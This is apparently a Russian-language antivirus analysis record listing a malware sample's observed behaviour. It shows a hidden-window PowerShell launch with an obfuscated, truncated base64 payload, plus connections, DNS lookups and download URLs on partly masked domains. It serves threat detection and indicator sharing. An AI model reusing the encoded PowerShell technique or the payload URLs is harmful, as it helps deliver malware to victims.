Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABOAGwAcAA3AGoAegBqAD0AKAAnAFUAegAnACsAKAAnAGwAaQAnACsAJwBwADYAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBmAGkAbABFAFwAWgAxAGgARg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
- %TEMP%\665625.cvr
- 'ha####weixun.com':443
- 'me####lucoesti.com':80
- 'bl##.#enmman.com':80
- http://me####lucoesti.com/R9KDq0O8w/B3KqPpe/
- http://bl##.#enmman.com/wp-content/uploads/1ECbn9K/
- 'ha####weixun.com':443
- DNS ASK ha####weixun.com
- DNS ASK ca####nacanullo.com
- DNS ASK me####lucoesti.com
- DNS ASK in###ution.org
- DNS ASK pe###ilm.com
- DNS ASK de#.###tractdevs.co.uk
- DNS ASK bl##.#enmman.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABOAGwAcAA3AGoAegBqAD0AKAAnAFUAegAnACsAKAAnAGwAaQAnACsAJwBwADYAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBmAGkAbABFAFwAWgAxAGgARg... (со скрытым окном)